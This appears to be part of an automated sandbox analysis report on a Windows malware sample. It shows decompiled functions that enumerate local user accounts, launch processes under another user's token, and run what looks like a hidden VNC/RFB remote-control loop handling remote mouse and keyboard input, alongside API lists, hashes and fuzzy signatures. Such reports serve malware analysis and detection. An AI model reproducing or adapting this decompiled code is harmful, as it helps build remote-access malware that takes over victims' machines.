0x0040f075
0x0040f084
0x0040f088
0x0040f088
0x0040f075
0x0040f063
0x0040f048
0x0040f038
0x0040f090
0x0040f090
0x0040f00a
0x0040f096
0x0040f097
0x0040f097
0x00000000
0x0040efea
0x0040efcb
0x0040efd0
0x00000000
0x00000000
0x00000000
0x0040f0a9
0x0040f0a9
0x0040f0a9
0x0040f0b6
0x0040f0c7
0x0040f0cd
0x0040f0cf
0x0040f0e8
0x0040f0ea
0x0040f0f5
0x0040f0fa
0x0040f0fc
0x0040f0fe
0x0040f0fe
0x0040f0fc
0x0040f0ea
0x00000000
0x0040f102
0x00000000
0x0040ef91

APIs

LoadLibraryW.KERNEL32(?,74B05B60,74B5F9B0,00000000), ref: 0040EEEC
GetProcAddress.KERNEL32(00000000,?), ref: 0040EF0D
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0040EF3E
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0040EF61
FreeLibrary.KERNEL32(00000000), ref: 0040EF88
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0040713E,?,?), ref: 0040EFBE
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0040EFF7
NetApiBufferFree.NETAPI32(?,?,?), ref: 0040F090
NetApiBufferFree.NETAPI32(?), ref: 0040F0A3
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0040F0C7

Strings

.exe, xrefs: 0040EFA0, 0040F04C, 0040F0D3

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
String ID: .exe
API String ID: 1753652487-4119554291
Opcode ID: 214f405c233c4c1bbcab52740121be6b5d5332fe82d0d5b6a7509f1374402142
Instruction ID: cc0b30bccd14120b24606f28cb6381146b358b84bc4e54c44f8bbee4a5fd5b43
Opcode Fuzzy Hash: 214f405c233c4c1bbcab52740121be6b5d5332fe82d0d5b6a7509f1374402142
Instruction Fuzzy Hash: C46170B1900218AEDF20DB90CD84EEEB7BDAB44344F5045BAF541F61D2D7399E498B29

Uniqueness

Uniqueness Score: -1.00%

Function 00417D43, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00417D43(void* _a4, WCHAR* _a8) {
				WCHAR* _v5;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				struct _PROCESS_INFORMATION _v40;
				struct _STARTUPINFOW _v108;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t31;
				WCHAR* _t49;
				long _t50;
				intOrPtr* _t52;

				_v5 = 0;
				_t28 = LoadLibraryA("userenv.dll");
				_v20 = _t28;
				if(_t28 != 0) {
					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
					_v24 = _t31;
					if(_t52 != 0 && _t31 != 0) {
						_push(0);
						_push(_a4);
						_push( &_v16);
						_v16 = 0;
						if( *_t52() == 0) {
							_v16 = 0;
						}
						_t50 = 0x44;
						_v12 = 0;
						E004164D4( &_v108,  &_v108, 0, _t50);
						_t49 = _a8;
						_v108.cb = _t50;
						_v108.lpDesktop = 0;
						if(_t49 == 0) {
							_t49 =  &_v12;
						}
						asm("sbb eax, eax");
						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
							CloseHandle(_v40.hThread);
							CloseHandle(_v40);
							_v5 = _v40.dwProcessId != 0;
						}
						if(_v16 != 0) {
							_v24(_v16);
						}
					}
					FreeLibrary(_v20);
				}
				return _v5 & 0x000000ff;
			}

0x00417d51
0x00417d54
0x00417d5a
0x00417d5f
0x00417d7d
0x00417d7f
0x00417d81
0x00417d86
0x00417d94
0x00417d95
0x00417d9b
0x00417d9c
0x00417da3
0x00417da5
0x00417da5
0x00417daa
0x00417dae
0x00417db7
0x00417dbc
0x00417dbf
0x00417dc2
0x00417dc7
0x00417dc9
0x00417dc9
0x00417ddb
0x00417df8
0x00417e03
0x00417e08
0x00417e0d
0x00417e0d
0x00417e14
0x00417e19
0x00417e19
0x00417e14
0x00417e1f
0x00417e26
0x00417e2d

APIs

LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00417D54
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00417D73
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00417D7F
CreateProcessAsUserW.ADVAPI32(?,00000000,0040E722,00000000,00000000,00000000,0040E722,0040E722,00000000,?,?,?,00000000,00000044), ref: 00417DF0
CloseHandle.KERNEL32(?), ref: 00417E03
CloseHandle.KERNEL32(?), ref: 00417E08
FreeLibrary.KERNEL32(?), ref: 00417E1F

Strings

DestroyEnvironmentBlock, xrefs: 00417D75
userenv.dll, xrefs: 00417D4C
CreateEnvironmentBlock, xrefs: 00417D6D

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
API String ID: 3080530829-1103369309
Opcode ID: 43a399e7f514e9dfd2638ba603818f931e42414218bdaec9a412893037d00d05
Instruction ID: 2ac8969cb8a45545e353dcb162156a037fb4fa25b77ec9b6065a62f9bc8d7e22
Opcode Fuzzy Hash: 43a399e7f514e9dfd2638ba603818f931e42414218bdaec9a412893037d00d05
Instruction Fuzzy Hash: 612105B2D0021DABDF009FA4DC859EFBBB8EF48344B14847AE615F6160D6399E54CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE91, Relevance: 16.4, APIs: 5, Strings: 4, Instructions: 671
synchronizationnetworkCOMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0040AE91(void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, signed char _a15, void* _a16) {
				signed int _v8;
				signed int _v13;
				signed short _v15;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v31;
				signed int _v32;
				signed int _v36;
				short _v41;
				short _v43;
				char _v44;
				char _v49;
				char _v52;
				char _v53;
				char _v56;
				char _v60;
				signed int _v64;
				char _v77;
				char _v78;
				unsigned int _v80;
				signed int _v84;
				char _v100;
				signed short _v102;
				signed short _v104;
				signed int _v109;
				char _v112;
				char _v116;
				char _v124;
				char _v380;
				void* __edi;
				void* __esi;
				void* _t205;
				char _t206;
				void* _t208;
				signed char _t212;
				unsigned int _t220;
				signed int _t225;
				signed int _t257;
				signed int _t261;
				signed int _t262;
				void* _t264;
				signed int _t265;
				void* _t274;
				void* _t280;
				signed int _t288;
				signed int _t289;
				void* _t291;
				signed int _t292;
				signed short _t296;
				unsigned int _t297;
				signed int _t300;
				signed int _t301;
				signed int _t303;
				intOrPtr _t305;
				signed int _t309;
				void* _t311;
				signed int _t312;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				void* _t321;
				signed int _t322;
				signed int _t329;
				void* _t331;
				signed int _t332;
				signed int _t333;
				signed char _t335;
				void* _t352;
				signed int _t353;
				void* _t355;
				signed int _t356;
				signed int _t366;
				signed int _t375;
				signed int _t382;
				signed int _t389;
				signed int _t390;
				unsigned int _t426;
				signed char _t442;
				signed char _t444;
				signed char _t446;
				signed int _t452;
				signed int _t461;
				void* _t472;
				signed int _t479;
				signed int _t490;
				signed int _t491;
				signed int _t496;
				char _t505;
				intOrPtr _t506;
				signed int _t507;
				signed short _t509;
				intOrPtr* _t517;
				signed int _t525;
				void* _t527;

				_t506 = _a8;
				_t206 = E0041944B(_t205, _a4, "RFB 003.003\n", 0xc);
				if(_t206 == 0) {
					L107:
					return _t206;
				}
				_push(0x1b7740);
				_push( &_v60);
				_t208 = 0xc;
				_t206 = E004193D4(_t208, _a4);
				if(_t206 == 0) {
					goto L107;
				}
				_push( &_v60);
				_t472 = 4;
				_t206 = E00416F84(_t472, "RFB ", _t472);
				if(_t206 != 0) {
					goto L107;
				}
				_v53 = _t206;
				_v49 = _t206;
				_t212 = E00416AA0( &_v52, "RFB ", 0);
				_t206 = ((E00416AA0( &_v56, "RFB ", 0) & 0x000000ff | (_t212 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
				if(_t206 > 0x300) {
					goto L107;
				} else {
					_v24 = _v24 & 0x00000000;
					_v20 = 1;
					 *((intOrPtr*)(_t506 + 4))( &_v24);
					_t220 = _v20;
					_t479 = (_t220 & 0x0000ff00 | _t220 << 0x00000010) << 8;
					_t399 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
					_v36 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
					if(E0041944B( &_v36, _a4,  &_v36, 4) == 0) {
						_v20 = _v20 | 0xffffffff;
					}
					_t225 = _v20;
					if(_t225 == 0) {
						return E0040AE2B(_t399, __eflags, _a4, _v24);
					}
					_t206 = _t225 - 1;
					if(_t206 != 0) {
						goto L107;
					}
					_t206 = E004193D4(1, _a4,  &_v31, 0x1b7740);
					if(_t206 == 0) {
						goto L107;
					}
					_t206 =  *((intOrPtr*)(_t506 + 8))();
					if(_t206 == 0) {
						goto L107;
					}
					_v36 = _v36 & 0x00000000;
					_t206 =  *((intOrPtr*)(_t506 + 0xc))( &_v124);
					_t403 = _t206;
					_t541 = _t206;
					if(_t206 == 0) {
						goto L107;
					}
					_t206 = E0040AC6A( &_v124, _t403,  &_v36, _t541, _a12);
					_t505 = _t206;
					if(_t505 == 0) {
						goto L107;
					}
					_t507 = E00416F5E(_v36);
					_v104 =  *(_t505 + 8) << 0x00000008 |  *(_t505 + 9) & 0x000000ff;
					_v102 =  *(_t505 + 0xa) << 0x00000008 |  *(_t505 + 0xb) & 0x000000ff;
					_v84 = (_t507 & 0x00ff0000 | _t507 >> 0x00000010) >> 0x00000008 | (_t507 << 0x00000010 | _t507 & 0x0000ff00) << 0x00000008;
					_t44 = _t505 + 0x20; // 0x20
					E0041645D( &_v100, _t44, 0x10);
					asm("rol word [ebp-0x5c], 0x8");
					asm("rol word [ebp-0x5a], 0x8");
					asm("rol word [ebp-0x58], 0x8");
					if(E0041944B( &_v104, _a4,  &_v104, 0x18) == 0 || _t507 > 0 && E0041944B(_t247, _a4, _v36, _t507) == 0) {
						return E0040ADF8(_t505);
					} else {
						_v41 = 0xffff;
						_v44 = 0;
						_v43 = 0xffff;
						E004164D4( &_v380,  &_v380, 0, 0xff);
						E004164D4( &_v380,  &_v380, 0, 0xff);
						_v8 = 0;
						_v20 = 0;
						goto L16;
						do {
							while(1) {
								L16:
								_t375 = _v8;
								_t509 = 0;
								if(_t375 <= 0) {
									goto L35;
								}
								L17:
								_t274 = E004196D1(0,  &_a4, 0x12c, 0);
								if(_t274 != 0xffffffff) {
									goto L35;
								}
								__imp__#111();
								if(_t274 != 0x274c) {
									L104:
									E0040ADF8(_t505);
									return E00416421(_v20);
								}
								if(_a16 != 0) {
									WaitForSingleObject(_a16, 0xffffffff);
								}
								 *((intOrPtr*)(_a8 + 0x10))();
								_v28 = _t509;
								if(_t375 <= _t509) {
									L33:
									if(_a16 != _t509) {
										ReleaseMutex(_a16);
									}
									continue;
									do {
										while(1) {
											L16:
											_t375 = _v8;
											_t509 = 0;
											if(_t375 <= 0) {
												goto L35;
											}
											goto L17;
										}
										L90:
										__eflags =  *(_t505 + 0x1c);
									} while ( *(_t505 + 0x1c) != 0);
									break;
								} else {
									_v24 = _t509;
									_t390 = _t375 * 9;
									do {
										_t527 = _v24 + _v20;
										if( *((short*)(_t527 + 5)) > 0 &&  *((short*)(_t527 + 7)) > 0) {
											_push(_t527);
											_push(_a4);
											_t280 = E0040A902(_t505);
											if(_t280 == 0xffffffff || _t280 == 0) {
												__eflags = _a16;
												if(_a16 != 0) {
													ReleaseMutex(_a16);
												}
												goto L104;
											} else {
												if(_t280 == 1) {
													_t283 = _v28 + 1;
													if(_v28 + 1 != _v8) {
														E004164D4(_t283, _t527, 0, 9);
													} else {
														_v8 = _v8 - 1;
														_t390 = _t390 - 9;
														E004163AC(_t390,  &_v20);
													}
												}
												goto L31;
											}
										}
										L31:
										_v28 = _v28 + 1;
										_v24 = _v24 + 9;
									} while (_v28 < _v8);
									_t509 = 0;
									goto L33;
								}
								L35:
								_t376 = _a4;
								_t414 = _a4;
								_t257 = E004193D4(1, _a4,  &_a15, 0x1b7740);
								__eflags = _t257;
								if(_t257 == 0) {
									goto L104;
								}
								_t261 = _a15 & 0x000000ff;
								__eflags = _t261;
								if(_t261 == 0) {
									_t262 = E0041941C(_t414, _t376, 3, 0x1b7740);
									__eflags = _t262;
									if(_t262 == 0) {
										goto L104;
									}
									_push(0x1b7740);
									_push( &_v80);
									_t264 = 0x10;
									_t265 = E004193D4(_t264, _t376);
									__eflags = _t265;
									if(_t265 == 0) {
										goto L104;
									}
									__eflags = _v80 - 0x20;
									if(_v80 == 0x20) {
										L99:
										__eflags = _v77;
										if(_v77 == 0) {
											goto L104;
										}
										asm("rol word [ebp-0x48], 0x8");
										asm("rol word [ebp-0x46], 0x8");
										asm("rol word [ebp-0x44], 0x8");
										__eflags = _v78;
										_v78 = _t265 & 0xffffff00 | _v78 != 0x00000000;
										_t196 = _t505 + 0x31; // 0x31
										_v77 = 1;
										E0041645D(_t196,  &_v80, 0x10);
										 *(_t505 + 0x41) = _v80 >> 3;
										while(1) {
											L16:
											_t375 = _v8;
											_t509 = 0;
											if(_t375 <= 0) {
												goto L35;
											}
											goto L17;
										}
									}
									__eflags = _v80 - 0x10;
									if(_v80 == 0x10) {
										goto L99;
									}
									__eflags = _v80 - 8;
									if(_v80 != 8) {
										goto L104;
									}
									goto L99;
								}
								_t288 = _t261;
								__eflags = _t288;
								if(_t288 == 0) {
									_t289 = E0041941C(_t414, _t376, 1, 0x1b7740);
									__eflags = _t289;
									if(_t289 == 0) {
										goto L104;
									}
									_push(0x1b7740);
									_push( &_v32);
									_t291 = 2;
									_t292 = E004193D4(_t291, _t376);
									__eflags = _t292;
									if(_t292 == 0) {
										goto L104;
									}
									 *(_t505 + 0x4c) =  *(_t505 + 0x4c) & 0x00000000;
									_t296 = (_v32 & 0xff) << 0x00000008 | (_v32 & 0x0000ffff) >> 0x00000008;
									 *(_t505 + 0x48) = _t296;
									__eflags = _t296;
									if(_t296 == 0) {
										L89:
										_t297 =  *(_t505 + 0x4c);
										_t490 = (_t297 << 0x00000010 | _t297 & 0x0000ff00) << 0x00000008 | _t297 >> 0x00000008 & 0x0000ff00 |  *(_t505 + 0x4f) & 0x000000ff;
										 *(_t505 + 0x50) = _t490;
										__eflags = _t297 - 5;
										if(_t297 != 5) {
											E00416421( *(_t505 + 0x1c));
											 *(_t505 + 0x1c) =  *(_t505 + 0x1c) & 0x00000000;
											while(1) {
												L16:
												_t375 = _v8;
												_t509 = 0;
												if(_t375 <= 0) {
													goto L35;
												}
												goto L17;
											}
										}
										goto L90;
									}
									_t378 = (_t296 & 0x0000ffff) << 2;
									_t161 = _t505 + 0x44; // 0x44
									_t517 = _t161;
									_t301 = E004163AC((_t296 & 0x0000ffff) << 2, _t517);
									__eflags = _t301;
									if(_t301 == 0) {
										goto L104;
									}
									_t303 = E004193D4(_t378, _a4,  *_t517, 0x1b7740);
									__eflags = _t303;
									if(_t303 == 0) {
										goto L104;
									}
									_v28 = _v28 & 0x00000000;
									__eflags = 0 -  *(_t505 + 0x48);
									if(0 >=  *(_t505 + 0x48)) {
										goto L89;
									}
									_t305 =  *_t517;
									do {
										_t491 = _v28 & 0x0000ffff;
										 *(_t305 + _t491 * 4) = ( *(_t305 + _t491 * 4) << 0x00000010 |  *(_t305 + _t491 * 4) & 0x0000ff00) << 0x00000008 | (_t305 + _t491 * 4)[0] & 0x000000ff |  *(_t305 + _t491 * 4) >> 0x00000008 & 0x0000ff00;
										_t305 =  *((intOrPtr*)(_t505 + 0x44));
										_t426 = 5;
										__eflags =  *(_t305 + _t491 * 4) - _t426;
										if( *(_t305 + _t491 * 4) == _t426) {
											 *(_t505 + 0x4c) = _t426;
										}
										_v28 = _v28 + 1;
										__eflags = _v28 -  *(_t505 + 0x48);
									} while (_v28 <  *(_t505 + 0x48));
									goto L89;
								}
								_t309 = _t288 - 1;
								__eflags = _t309;
								if(_t309 == 0) {
									_push(0x1b7740);
									_push( &_v56);
									_t311 = 9;
									_t312 = E004193D4(_t311, _t376);
									__eflags = _t312;
									if(_t312 == 0) {
										goto L104;
									}
									asm("rol word [ebp-0x33], 0x8");
									asm("rol word [ebp-0x31], 0x8");
									asm("rol word [ebp-0x2f], 0x8");
									asm("rol word [ebp-0x2d], 0x8");
									__eflags = _v56;
									_t382 = 0;
									_v56 = _t312 & 0xffffff00 | _v56 != 0x00000000;
									__eflags = _v8;
									if(_v8 <= 0) {
										L76:
										__eflags = _t382 - _v8;
										if(_t382 != _v8) {
											L78:
											E0041645D(_t382 * 9 + _v20,  &_v56, 9);
											while(1) {
												L16:
												_t375 = _v8;
												_t509 = 0;
												if(_t375 <= 0) {
													goto L35;
												}
												goto L17;
											}
											goto L35;
										}
										_v8 = _v8 + 1;
										_t316 = E004163AC(_v8 * 9,  &_v20);
										__eflags = _t316;
										if(_t316 == 0) {
											goto L104;
										}
										goto L78;
									}
									_t318 = _v20 + 7;
									__eflags = _t318;
									do {
										__eflags =  *(_t318 - 2);
										if( *(_t318 - 2) != 0) {
											goto L75;
										}
										__eflags =  *_t318;
										if( *_t318 == 0) {
											goto L76;
										}
										L75:
										_t382 = _t382 + 1;
										_t318 = _t318 + 9;
										__eflags = _t382 - _v8;
									} while (_t382 < _v8);
									goto L76;
								}
								_t319 = _t309 - 1;
								__eflags = _t319;
								if(_t319 == 0) {
									_push(0x1b7740);
									_push( &_v112);
									_t321 = 7;
									_t322 = E004193D4(_t321, _t376);
									__eflags = _t322;
									if(_t322 == 0) {
										goto L104;
									}
									__eflags = _v112;
									_t490 = (_v109 & 0x00ff0000 | _v109 >> 0x00000010) >> 0x00000008 | (_v109 << 0x00000010 | _v109 & 0x0000ff00) << 0x00000008;
									 *((intOrPtr*)(_a8 + 0x14))((_t322 & 0xffffff00 | _v112 != 0x00000000) & 0x000000ff);
									continue;
								}
								_t329 = _t319 - 1;
								__eflags = _t329;
								if(_t329 == 0) {
									_push(0x1b7740);
									_push( &_v16);
									_t331 = 5;
									_t332 = E004193D4(_t331, _t376);
									__eflags = _t332;
									if(_t332 == 0) {
										goto L104;
									}
									asm("rol word [ebp-0xb], 0x8");
									asm("rol word [ebp-0x9], 0x8");
									_v24 = _v24 & 0x00000000;
									_t525 = 0x8000;
									_t333 = GetSystemMetrics(0x17);
									__eflags = _t333;
									_t496 = _t490 & 0xffffff00 | _t333 != 0x00000000;
									__eflags = _v15 - _v43;
									if(_v15 != _v43) {
										L50:
										_t525 = 0x8001;
										L51:
										_t335 = _v44;
										_t442 = _v16 & 0x00000001;
										__eflags = _t442 - (_t335 & 0x00000001);
										if(_t442 != (_t335 & 0x00000001)) {
											__eflags = _t442;
											if(_t442 == 0) {
												__eflags = _t496;
												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
												__eflags = _t461;
											} else {
												__eflags = _t496;
												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
											}
											_t525 = _t525 | _t461;
											__eflags = _t525;
										}
										_t444 = _v16 & 0x00000004;
										__eflags = _t444 - (_t335 & 0x00000004);
										if(_t444 != (_t335 & 0x00000004)) {
											__eflags = _t444;
											if(_t444 == 0) {
												__eflags = _t496;
												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
												__eflags = _t452;
											} else {
												__eflags = _t496;
												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
											}
											_t525 = _t525 | _t452;
											__eflags = _t525;
										}
										_t446 = _v16 & 0x00000002;
										__eflags = _t446 - (_t335 & 0x00000002);
										if(_t446 != (_t335 & 0x00000002)) {
											__eflags = _t446;
											_t525 = _t525 | ((0 | _t446 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
											__eflags = _t525;
										}
										__eflags = _v16 & 0x00000008;
										if((_v16 & 0x00000008) != 0) {
											_t525 = _t525 | 0x00000800;
											__eflags = _t525;
											_v24 = 0x78;
										}
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) != 0) {
											_t525 = _t525 | 0x00000800;
											__eflags = _t525;
											_v24 = 0xffffff88;
										}
										E0041645D( &_v44,  &_v16, 5);
										_t490 = _t525;
										 *((intOrPtr*)(_a8 + 0x18))(_v15 & 0x0000ffff, _v13 & 0x0000ffff, _v24);
										continue;
									}
									__eflags = _v13 - _v41;
									if(_v13 == _v41) {
										goto L51;
									}
									goto L50;
								}
								__eflags = _t329 != 1;
								if(_t329 != 1) {
									goto L104;
								}
								_push(0x1b7740);
								_push( &_v116);
								_t352 = 3;
								_t353 = E004193D4(_t352, _t376);
								__eflags = _t353;
								if(_t353 == 0) {
									goto L104;
								}
								_push(0x1b7740);
								_push( &_v64);
								_t355 = 4;
								_t356 = E004193D4(_t355, _t376);
								__eflags = _t356;
								if(_t356 == 0) {
									goto L104;
								}
								_v64 = (_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008;
								_t389 = E004163F1(((_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008) + 1);
								__eflags = _t389;
								if(_t389 == 0) {
									E00416421(0);
									goto L104;
								}
								_t366 = E004193D4(_v64, _a4, _t389, 0x1b7740);
								__eflags = _t366;
								if(_t366 == 0) {
									goto L104;
								}
								_t490 = _v64;
								 *((intOrPtr*)(_a8 + 0x1c))(_t389);
								E00416421(_t389);
							}
							_t300 = E004163F1(0x400);
							 *(_t505 + 0x1c) = _t300;
							__eflags = _t300;
						} while (_t300 != 0);
						goto L104;
					}
				}
			}

0x0040ae9c
0x0040aeaa
0x0040aeb1
0x0040b67c
0x0040b67c
0x0040b67c
0x0040aeba
0x0040aec2
0x0040aec5
0x0040aec6
0x0040aecd
0x00000000
0x00000000
0x0040aed6
0x0040aed9
0x0040aee1
0x0040aee8
0x00000000
0x00000000
0x0040aeee
0x0040aef1
0x0040aef9
0x0040af16
0x0040af23
0x00000000
0x0040af29
0x0040af2b
0x0040af37
0x0040af3a
0x0040af3d
0x0040af65
0x0040af6c
0x0040af6e
0x0040af78
0x0040af7a
0x0040af7a
0x0040af81
0x0040af84
0x00000000
0x0040b673
0x0040af8a
0x0040af8b
0x00000000
0x00000000
0x0040af9f
0x0040afa6
0x00000000
0x00000000
0x0040afb5
0x0040afba
0x00000000
0x00000000
0x0040afc2
0x0040afcd
0x0040afd0
0x0040afd2
0x0040afd4
0x00000000
0x00000000
0x0040afe0
0x0040afe5
0x0040afe9
0x00000000
0x00000000
0x0040affb
0x0040b008
0x0040b01b
0x0040b040
0x0040b045
0x0040b04d
0x0040b052
0x0040b057
0x0040b05c
0x0040b071
0x00000000
0x0040b091
0x0040b09e
0x0040b0aa
0x0040b0ad
0x0040b0b1
0x0040b0bf
0x0040b0c4
0x0040b0c7
0x0040b0c7
0x0040b0ca
0x0040b0ca
0x0040b0ca
0x0040b0ca
0x0040b0cd
0x0040b0d1
0x00000000
0x00000000
0x0040b0d7
0x0040b0e3
0x0040b0eb
0x00000000
0x00000000
0x0040b0f1
0x0040b0fc
0x0040b653
0x0040b655
0x00000000
0x0040b65d
0x0040b105
0x0040b10c
0x0040b10c
0x0040b117
0x0040b11a
0x0040b11f
0x0040b192
0x0040b195
0x0040b19e
0x0040b19e
0x00000000
0x0040b0ca
0x0040b0ca
0x0040b0ca
0x0040b0ca
0x0040b0cd
0x0040b0d1
0x00000000
0x00000000
0x00000000
0x0040b0d1
0x0040b594
0x0040b594
0x0040b594
0x00000000
0x0040b121
0x0040b121
0x0040b124
0x0040b127
0x0040b12a
0x0040b132
0x0040b13b
0x0040b13c
0x0040b141
0x0040b149
0x0040b63b
0x0040b63f
0x0040b644
0x0040b644
0x00000000
0x0040b157
0x0040b15a
0x0040b15f
0x0040b163
0x0040b17c
0x0040b165
0x0040b165
0x0040b168
0x0040b170
0x0040b170
0x0040b163
0x00000000
0x0040b15a
0x0040b149
0x0040b181
0x0040b181
0x0040b187
0x0040b18b
0x0040b190
0x00000000
0x0040b190
0x0040b1a9
0x0040b1a9
0x0040b1b9
0x0040b1bb
0x0040b1c0
0x0040b1c2
0x00000000
0x00000000
0x0040b1cc
0x0040b1cc
0x0040b1cf
0x0040b5cd
0x0040b5d2
0x0040b5d4
0x00000000
0x00000000
0x0040b5d6
0x0040b5da
0x0040b5dd
0x0040b5e0
0x0040b5e5
0x0040b5e7
0x00000000
0x00000000
0x0040b5e9
0x0040b5ed
0x0040b5fb
0x0040b5fb
0x0040b5ff
0x00000000
0x00000000
0x0040b601
0x0040b606
0x0040b60b
0x0040b610
0x0040b619
0x0040b620
0x0040b624
0x0040b628
0x0040b633
0x0040b0ca
0x0040b0ca
0x0040b0ca
0x0040b0cd
0x0040b0d1
0x00000000
0x00000000
0x00000000
0x0040b0d1
0x0040b0ca
0x0040b5ef
0x0040b5f3
0x00000000
0x00000000
0x0040b5f5
0x0040b5f9
0x00000000
0x00000000
0x00000000
0x0040b5f9
0x0040b1d6
0x0040b1d6
0x0040b1d7
0x0040b498
0x0040b49d
0x0040b49f
0x00000000
0x00000000
0x0040b4a5
0x0040b4a9
0x0040b4ac
0x0040b4af
0x0040b4b4
0x0040b4b6
0x00000000
0x00000000
0x0040b4c0
0x0040b4d1
0x0040b4d3
0x0040b4d7
0x0040b4da
0x0040b567
0x0040b567
0x0040b58a
0x0040b58c
0x0040b58f
0x0040b592
0x0040b5bb
0x0040b5c0
0x0040b0ca
0x0040b0ca
0x0040b0ca
0x0040b0cd
0x0040b0d1
0x00000000
0x00000000
0x00000000
0x0040b0d1
0x0040b0ca
0x00000000
0x0040b592
0x0040b4e3
0x0040b4e6
0x0040b4e6
0x0040b4eb
0x0040b4f0
0x0040b4f2
0x00000000
0x00000000
0x0040b504
0x0040b509
0x0040b50b
0x00000000
0x00000000
0x0040b511
0x0040b517
0x0040b51b
0x00000000
0x00000000
0x0040b51d
0x0040b51f
0x0040b51f
0x0040b54a
0x0040b54c
0x0040b551
0x0040b552
0x0040b555
0x0040b557
0x0040b557
0x0040b55a
0x0040b561
0x0040b561
0x00000000
0x0040b51f
0x0040b1dd
0x0040b1dd
0x0040b1de
0x0040b407
0x0040b40b
0x0040b40e
0x0040b411
0x0040b416
0x0040b418
0x00000000
0x00000000
0x0040b41e
0x0040b423
0x0040b428
0x0040b42d
0x0040b432
0x0040b43b
0x0040b43d
0x0040b440
0x0040b443
0x0040b45f
0x0040b45f
0x0040b462
0x0040b47d
0x0040b48a
0x0040b0ca
0x0040b0ca
0x0040b0ca
0x0040b0cd
0x0040b0d1
0x00000000
0x00000000
0x00000000
0x0040b0d1
0x00000000
0x0040b0ca
0x0040b464
0x0040b470
0x0040b475
0x0040b477
0x00000000
0x00000000
0x00000000
0x0040b477
0x0040b448
0x0040b448
0x0040b44b
0x0040b44b
0x0040b44f
0x00000000
0x00000000
0x0040b451
0x0040b454
0x00000000
0x00000000
0x0040b456
0x0040b456
0x0040b457
0x0040b45a
0x0040b45a
0x00000000
0x0040b44b
0x0040b1e4
0x0040b1e4
0x0040b1e5
0x0040b3b2
0x0040b3b6
0x0040b3b9
0x0040b3bc
0x0040b3c1
0x0040b3c3
0x00000000
0x00000000
0x0040b3c9
0x0040b3fb
0x0040b3ff
0x00000000
0x0040b3ff
0x0040b1eb
0x0040b1eb
0x0040b1ec
0x0040b28c
0x0040b290
0x0040b293
0x0040b296
0x0040b29b
0x0040b29d
0x00000000
0x00000000
0x0040b2a3
0x0040b2a8
0x0040b2ad
0x0040b2b3
0x0040b2b8
0x0040b2be
0x0040b2c4
0x0040b2c7
0x0040b2cb
0x0040b2d7
0x0040b2d7
0x0040b2dc
0x0040b2dc
0x0040b2e4
0x0040b2ea
0x0040b2ec
0x0040b2ee
0x0040b2f0
0x0040b304
0x0040b30d
0x0040b30d
0x0040b2f2
0x0040b2f4
0x0040b2fd
0x0040b2fd
0x0040b310
0x0040b310
0x0040b310
0x0040b317
0x0040b31d
0x0040b31f
0x0040b321
0x0040b323
0x0040b337
0x0040b340
0x0040b340
0x0040b325
0x0040b327
0x0040b330
0x0040b330
0x0040b343
0x0040b343
0x0040b343
0x0040b348
0x0040b34d
0x0040b34f
0x0040b353
0x0040b35f
0x0040b35f
0x0040b35f
0x0040b361
0x0040b365
0x0040b367
0x0040b367
0x0040b36d
0x0040b36d
0x0040b374
0x0040b378
0x0040b37a
0x0040b37a
0x0040b380
0x0040b380
0x0040b391
0x0040b39d
0x0040b3aa
0x00000000
0x0040b3aa
0x0040b2d1
0x0040b2d5
0x00000000
